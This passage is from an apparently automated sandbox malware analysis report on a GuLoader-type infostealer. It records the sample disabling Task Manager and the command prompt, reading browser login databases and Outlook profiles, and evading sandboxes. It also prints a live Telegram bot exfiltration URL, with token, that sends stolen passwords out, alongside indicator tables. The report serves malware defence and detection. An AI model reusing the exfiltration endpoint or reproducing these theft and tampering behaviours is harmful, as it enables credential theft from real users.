            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595541Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595218Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595107Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594993Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594561Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594452Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594343Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594234Jump to behavior
            Source: FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeAPI call chain: ExitProcess graph end nodegraph_0-3761
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeAPI call chain: ExitProcess graph end nodegraph_0-3941
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess created: C:\Users\user\Desktop\FILHKLtCw0.exe "C:\Users\user\Desktop\FILHKLtCw0.exe"Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Users\user\Desktop\FILHKLtCw0.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: FILHKLtCw0.exe PID: 5852, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: FILHKLtCw0.exe PID: 5852, type: MEMORYSTR
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: FILHKLtCw0.exe PID: 5852, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: FILHKLtCw0.exe PID: 5852, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: FILHKLtCw0.exe PID: 5852, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            FILHKLtCw0.exe61%ReversingLabsWin32.Trojan.Guloader
            FILHKLtCw0.exe75%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://api.telegram.orgX0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.181.238
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.193
              truefalse
                high
                reallyfreegeoip.org
                104.21.64.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comFILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/HFILHKLtCw0.exe, 00000004.00000002.3310429349.0000000038998000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/YFILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsFILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://api.telegram.orgXFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://drive.google.com/FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgFILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036138000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgFILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/FILHKLtCw0.exe, 00000004.00000003.3019370982.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036114000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comFILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorFILHKLtCw0.exefalse
                                                            high
                                                            http://api.telegram.orgFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFILHKLtCw0.exe, 00000004.00000002.3309261776.00000000360A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/VTFILHKLtCw0.exe, 00000004.00000003.3019370982.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    142.250.181.238
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.185.193
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    193.122.6.168
                                                                    checkip.dyndns.comUnited States
                                                                    31898ORACLE-BMC-31898USfalse
                                                                    104.21.64.1
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1587996
                                                                    Start date and time:2025-01-10 20:21:30 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 7m 36s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:5
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:FILHKLtCw0.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:12ba9e377bd0dd9470038a28d9c076d28bd8e4bc9c419148a7ae4c20b7a831ba.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 149
                                                                    • Number of non-executed functions: 113
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    14:24:08API Interceptor142x Sleep call for process: FILHKLtCw0.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                              YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        193.122.6.168m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        checkip.dyndns.comppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.8.169
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.8.169
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        reallyfreegeoip.orgppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.96.1
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.16.1
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.112.1
                                                                                        xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.112.1
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        api.telegram.orgppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ORACLE-BMC-31898USm0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        TELEGRAMRUppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        CLOUDFLARENETUSEIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                        • 172.67.137.47
                                                                                        ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.67.152.246
                                                                                        wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                                        • 188.114.97.3
                                                                                        https://probashkontho.com/work/Organization/privacy/index_.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        psibx9rXra.exeGet hashmaliciousFormBookBrowse
                                                                                        • 23.227.38.74
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.7.187
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        54328bd36c14bd82ddaa0c04b25ed9adppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.64.1
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
